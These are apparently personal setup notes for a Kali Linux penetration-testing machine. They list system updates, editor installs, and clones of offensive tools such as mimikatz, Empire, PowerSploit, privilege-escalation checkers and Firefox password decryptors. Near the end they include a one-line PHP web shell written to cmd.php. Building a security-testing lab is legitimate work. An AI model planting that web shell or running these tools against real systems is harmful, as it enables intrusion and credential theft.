Kali setup and installs

Initial setup

sudo apt-get clean && sudo apt-get update && sudo apt-get upgrade -y && sudo apt-get dist-upgrade -y

sudo reboot

Add additional user:

sudo useradd -m glasgow
sudo passwd glasgow
sudo usermod -a -G sudo,vboxsf,docker glasgow
# sudo usermod -a -G docker glasgow
# sudo usermod -a -G sudo glasgow
# sudo usermod -a -G vboxsf glasgow
sudo chsh -s /bin/bash glasgow

Regenerate Default ssh keys

# This will move your default keys to the new folder...
cd /etc/ssh/
sudo mkdir default_kali_keys
sudo mv ssh_host_* default_kali_keys/

# Regenerate the keys:
sudo dpkg-reconfigure openssh-server

# Verify ssh key hashes are different
# Compare new key hashes to the hashes below
md5sum ssh_host_*
md5sum default_kali_keys/*

configure git config

git config --global user.name Glasgow
git config --global user.email Glasgow@localhost

Install Anaconda:

https://www.anaconda.com/distribution/

Removing Anaconda:

# remove the install directory
rm -rf ~/anaconda3

# check bashrc for path modification added by Anaconda3 installer
# export PATH="/root/anaconda3/bin:$PATH"

# remove hidden files
rm -rf ~/.condarc ~/.conda ~/.continuum

Install Atom (Text Editor)

• download atom-amd64.deb from https://atom.io/

https://flight-manual.atom.io/getting-started/sections/installing-atom/

wget https://atom.io/download/deb
# Install Atom
sudo dpkg -i atom-amd64.deb
# Install Atom's dependencies if they are missing
sudo apt-get -f install

Install packages

apm install atom-beautify autocomplete-python file-icons highlight-selected minimap minimap-highlight-selected open-recent pdf-view seti-ui sort-lines split-diff

other I've used in the past:

linter
linter-flake8
linter-ui-default
python-autopep8

Install Google Chrome

• https://esc.sh/blog/how-to-install-and-use-google-chrome-on-kali-linux-2-0/
• https://linuxconfig.org/how-to-install-google-chrome-browser-on-kali-linux

wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
apt-get install gdebi
gdebi google-chrome-stable_current_amd64.deb
dpkg -i Downloads/google-chrome-stable_current_amd64.deb

Note that you can't run this as root Run as another user (may need to use xhost +)

Apache Directory Studio

ApacheDirectoryStudio - LDAP Viewer

IDA

idafree

PyCharm

https://www.jetbrains.com/pycharm/download/#section=linux

Cutter

https://cutter.re/

Linux Packages

sudo apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

# Install guest additions
# sudo apt-get install -y virtualbox-guest-x11
# reboot

# Docker
sudo apt install docker.io

# Some miscellaneous downloads
sudo apt-get install ipython3
sudo apt-get install gobuster -y
sudo apt-get install jq -y

sudo apt-get install cifs-utils
sudo apt-get install ncftp
sudo apt-get install filezilla filezilla-common -y
sudo apt-get install libreoffice -y
sudo apt-get install bleachbit -y
sudo apt-get install steghide -y
sudo apt-get install mcrypt -y
sudo apt-get install gimp -y
sudo apt-get install putty-tools -y
sudo apt-get install exiftool
sudo apt install pandoc
sudo apt install lynx
sudo apt install lolcat  # add /usr/games to path


# buffer overflow stuff
sudo apt-get install ropper
gem install one_gadget

# ARM executable
# apt-get install qemu

#apt-get install tor
#service tor start # Check additional steps involving "tor bundle"
#apt-get install keepass2 -y
#apt-get install jd-gui #jar decompiler
#apt-get install rpcbind -y # for 'rpcinfo'
#apt-get install nfs-common -y # for 'showmount'

#apt install mono-mcs    # used to compile c# programs
#apt-get install mingw-w64   # this is to compile windows headers (c/c++)
#apt-get install gcc-multilib
#apt-get install redis

# apt-get install thunderbird

# pdf utilities (read from command line; etc.)
# https://www.howtogeek.com/228531/how-to-convert-a-pdf-file-to-editable-text-using-the-command-line-in-linux/
# apt-get install poppler-utils

apt-get install pdfcrack

apt-get install bruteforce-salted-openssl

# apt-get install preload # Preload application (pre-loads binaries and dependancies of most commonly used applications)

# wine is used to run windows exe's
# dpkg --add-architecture i386 && apt-get update && apt-get install wine32

# Download OpenVAS
# additional info @ https://www.kali.org/penetration-testing/openvas-vulnerability-scanning/
# apt-get install openvas -y
# openvas-setup

# apt-get install nbtscan-unixwiz

# Linux Priv Checker (open link in browser for download)
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&cad=rja&uact=8&ved=0ahUKEwinnazY2OLWAhXF7iYKHaBDBZcQFgg9MAQ&url=https%3A%2F%2Fwww.securitysift.com%2Fdownload%2Flinuxprivchecker.py&usg=AOvVaw1aPu93f3PMi0zK8sc0o2ZV

Github

# SecLists is a collection of multiple types of lists used during security assessments. List types include usernames, passwords, URLs, sensitive data grep strings, fuzzing payloads, and many more.
git clone https://github.com/danielmiessler/SecLists.git /usr/share/wordlists/SecLists
cd /usr/share && ln -s wordlists/SecLists/ seclists  # creates symbolic link (for Reconnoitre)
### alternatively, just run apt -y install seclists


# Reconnoitre (nmap and sparta alternative)
git clone https://github.com/codingo/Reconnoitre.git ~/opt/Reconnoitre

git clone git@github.com:codingo/VHostScan.git ~/opt/VHostScan
# sed 's/$/.\%s/g' /usr/share/wordlists/SecLists/Discovery/DNS/fierce-hostlist.txt #> ~/opt/virtual-host-discovery/SecLists_fierce-hostlist.txt

# Python PTY backdoors - full PTY or nothing!
git clone https://github.com/infodox/python-pty-shells.git ~/opt/python-pty-shells

git clone https://github.com/trustedsec/unicorn.git ~/opt/unicorn

# Exploit Suggesters and enumeration
git clone https://github.com/sleventyeleven/linuxprivchecker.git ~~/opt/Enumeration/Linux/linuxprivchecker
git clone https://github.com/mzet-/linux-exploit-suggester.git ~~/opt/Enumeration/Linux/linux-exploit-suggester
git clone https://github.com/NullArray/MIDA-Multitool.git ~~/opt/Enumeration/MIDA-Multitool
git clone https://github.com/NullArray/RootHelper.git ~~/opt/Enumeration/RootHelper
git clone https://github.com/diego-treitos/linux-smart-enumeration.git ~~/opt/Enumeration/Linux/linux-smart-enumeration
git clone https://github.com/carlospolop/linPE.git ~~/opt/Enumeration/Linux/linPE
git clone https://github.com/InteliSecureLabs/Linux_Exploit_Suggester.git ~~/opt/Enumeration/Linux/Linux_Exploit_Suggester
git clone https://github.com/rebootuser/LinEnum.git ~~/opt/Enumeration/Linux/LinEnum

# Windows privesc
git clone https://github.com/pentestmonkey/windows-privesc-check.git ~/opt/Enumeration/Windows/windows-privesc-check

# PowerShell
git clone https://github.com/samratashok/nishang.git ~/opt/nishang
git clone https://github.com/Mr-Un1k0d3r/ThunderShell.git ~/opt/ThunderShell
git clone https://github.com/Mr-Un1k0d3r/PowerLessShell.git ~/opt/PowerLessShell

# NEET - Network Enumeration and Exploitation Tool
git clone https://github.com/JonnyHightower/neet.git ~/opt/neet

git clone https://github.com/alias1/sparty.git ~/opt/sparty

# PowerSploit - A PowerShell Post-Exploitation Framework (some directory lists under PowerSploit/Recon/Dictionaries/)
git clone https://github.com/PowerShellMafia/PowerSploit.git ~/opt/PowerSploit

# phpbash
git clone https://github.com/Arrexel/phpbash.git ~/opt/phpbash

# RsaCTFTool (to crack weak public rsa key)
### from github readme:
git clone https://github.com/Ganapati/RsaCtfTool.git ~~/opt/RsaCtfTool
sudo apt-get install libgmp3-dev libmpc-dev
pip3 install -r "requirements.txt"
python3 RsaCtfTool.py


# libnum (needed for RsaCTFTool)
git clone https://github.com/hellman/libnum.git
python setup.py install

# ImageTragick - https://github.com/jpeanut/ImageTragick-CVE-2016-3714-RShell.git

# peda
git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit
echo "DONE! debug your program with gdb and enjoy"

# NfSpy - an ID-spoofing NFS client
git clone https://github.com/bonsaiviking/NfSpy ~/opt/NfSpy

# Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent.
git clone https://github.com/EmpireProject/Empire ~/opt/Empire
bash ~/opt/Empire/setup/install.sh

# PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server
git clone https://github.com/NetSPI/PowerUpSQL ~/opt/PowerUpSQL

# socat-shell
git clone https://github.com/cornerpirate/socat-shell.git

# dirsearch - dirsearch is a simple command line tool designed to brute force directories and files in websites.
git clone https://github.com/maurosoria/dirsearch.git ~/opt/dirsearch

# firepwd.py, an open source tool to decrypt Mozilla protected passwords
git clone https://github.com/lclevy/firepwd.git ~/opt/firepwd

# Firefox Decrypt is a tool to extract passwords from Mozilla (Firefox/Thunderbird/Seabird) profiles
git clone https://github.com/unode/firefox_decrypt.git ~/opt/firefox_decrypt

# responder
# git clone https://github.com/SpiderLabs/Responder
apt install responder

# pwnedOrNot (checks for emails in data breaches)
git clone https://github.com/thewhiteh4t/pwnedOrNot.git

# mimikatz
git clone https://github.com/gentilkiwi/mimikatz.git ~/opt/mimikatz

# virtual-host-discovery
git clone https://github.com/jobertabma/virtual-host-discovery.git ~/opt/virtual-host-discovery
# sed "s/\$/\.\%s/g" /usr/share/wordlists/SecLists/Discovery/DNS/fierce-hostlist.txt > ~/opt/virtual-host-discovery/wordlist_2.txt
sed "s/\$/\.\%s/g" /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt > ~/opt/virtual-host-discovery/wordlist_2.txt

# hash_extender
git clone https://github.com/iagox86/hash_extender.git ~/opt/hash_extender

# eviler-winrm
git clone https://github.com/swarley/eviler-winrm.git ~/opt/eviler-winrm

# ropstar
git clone https://github.com/xct/ropstar.git ~/opt/ropstar

Python Packages

pip installs:

pip install pwntools
pip install pyftpdlib

pip3 install yq # https://github.com/kislyuk/yq (jq for yaml / xml)
pip3 install awscli

# https://jupyter.org/install
python3 -m pip install jupyter

#pip3 install stego-lsb # https://github.com/ragibson/Steganography#WavSteg
#pip3 install stegcracker # https://github.com/Paradoxis/StegCracker

pip install termcolor

# oletools
### https://github.com/decalage2/oletools
# pip install -U oletools

# truffleHog - Searches through git repositories for secrets, digging deep into commit history and branches. This is effective at finding secrets accidentally committed.
### https://github.com/dxa4481/truffleHog
# pip3 install truffleHog

pip install pymysql # from craft HTB machine

pip3 install web3

Ruby Gems:

## this didn't work well with code blocks -- gem install mdless # markdown viewer in terminal

Miscellaneous

PHP Script for code execution

# simple script for php code execution
mkdir ~/opt/php
echo "<?php echo system(\$_REQUEST['var']); ?>" > ~/opt/php/cmd.php

Rebuild Metasploit Cache (fix slow search)

service postgresql start
update-rc.d postgresql enable #to start on reboot
msfdb init
msfconsole -x "db_rebuild_cache"

Enable Auto-login user

leafpad /etc/gdm3/daemon.conf
--> uncomment these two lines:
# AutomaticLoginEnable = true
# AutomaticLogin = root

Periodic Clean-up

#uninstalling unnecessary programs and packages:
sudo apt-get autoremove -y

#For cleaning cache:
sudo apt-get clean -y

to fix SSL_ERROR_RX_RECORD_TOO_LONG error when using burp

1. within Firefox: about:config
2. security.tls.version.max
3. Update value from 4 (default) to 3

Firefox Add-on: * https://www.wappalyzer.com